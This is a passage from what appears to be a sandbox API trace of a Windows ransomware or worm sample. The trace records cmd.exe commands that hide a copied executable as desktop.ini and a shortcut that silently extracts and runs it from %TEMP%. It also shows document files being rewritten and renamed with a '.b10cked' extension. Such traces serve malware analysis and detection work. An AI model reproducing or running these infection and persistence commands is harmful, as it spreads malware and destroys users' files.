lpString2="\\", cchCount2=1) returned 2 [0133.164] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0133.165] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0133.165] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0133.165] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0133.165] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0133.165] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0133.165] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd") returned 0x27 [0133.165] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x15a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\XJ2FMD\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\XJ2FMD\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\XJ2FMD\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\XJ2FMD\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x15a [0133.165] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0133.165] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xa44, dwThreadId=0xa4c)) returned 1 [0133.184] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0133.900] CloseHandle (hObject=0x114) returned 1 [0133.900] CloseHandle (hObject=0x110) returned 1 [0133.900] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0133.900] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0133.901] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0133.901] GetTickCount () returned 0x2a7f1 [0133.901] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=19069000482) returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x49\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x57\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x54\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x53\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x71\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.901] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0133.901] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0133.901] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0133.901] CharUpperBuffW (in: lpsz="explorer.exe \"xJ2fmd\" & type \"xJ2fmd\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5d | out: lpsz="EXPLORER.EXE \"XJ2FMD\" & TYPE \"XJ2FMD\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5d [0133.901] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0133.901] CharUpperBuffW (in: lpsz="explorer.exe \"xJ2fmd\" & type \"xJ2fmd\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5e | out: lpsz="EXPLORER.EXE \"XJ2FMD\" & TYPE \"XJ2FMD\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5e [0133.901] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0133.901] CoInitialize (pvReserved=0x0) returned 0x0 [0133.902] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0133.903] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0133.903] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0133.903] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0133.905] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"xJ2fmd\" & type \"xJ2fmd\\desktop.ini\" > \"%TEMP%\\Ip8WTSwq.exe\" && \"%TEMP%\\Ip8WTSwq.exe\"") returned 0x0 [0133.905] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0133.905] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0133.905] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0133.905] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd.lnk", fRemember=0) returned 0x0 [0133.918] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0133.918] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0133.918] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0133.918] CoUninitialize () [0133.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.919] ReleaseMutex (hMutex=0xf8) returned 1 [0133.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.919] ReleaseMutex (hMutex=0xf8) returned 1 [0133.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.919] ReleaseMutex (hMutex=0xf8) returned 1 [0133.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.919] ReleaseMutex (hMutex=0xf8) returned 1 [0133.919] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\Tq3yPk_6C.docx" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfhtfadyqia-_\\tq3ypk_6c.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0133.919] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19070887715) returned 1 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x8527 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8527 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.921] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x803f [0133.921] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x8527 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x8527 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0133.923] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x4292, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x4292, lpOverlapped=0x0) returned 1 [0133.923] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0133.924] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4292, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4292, lpOverlapped=0x0) returned 1 [0133.924] SetFilePointer (in: hFile=0x114, lDistanceToMove=-17042, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x4295 [0133.924] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x4292, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x4292, lpOverlapped=0x0) returned 1 [0133.924] SetFilePointer (in: hFile=0x114, lDistanceToMove=-17042, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x4295 [0133.924] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4292, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4292, lpOverlapped=0x0) returned 1 [0133.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tq3yPk_6C.docx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0133.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tq3yPk_6C.docx", cchWideChar=14, lpMultiByteStr=0x131326c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tq3yPk_6C.docx", lpUsedDefaultChar=0x0) returned 14 [0133.929] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x8527 [0133.929] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0133.929] CloseHandle (hObject=0x114) returned 1 [0133.930] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\Tq3yPk_6C.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC") returned 0x33 [0133.931] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\") returned 0x27 [0133.931] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xc4c, dwThreadId=0xb70)) returned 1 [0133.933] CloseHandle (hObject=0x110) returned 1 [0133.933] CloseHandle (hObject=0x114) returned 1 [0133.933] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0133.933] CharUpperBuffW (in: 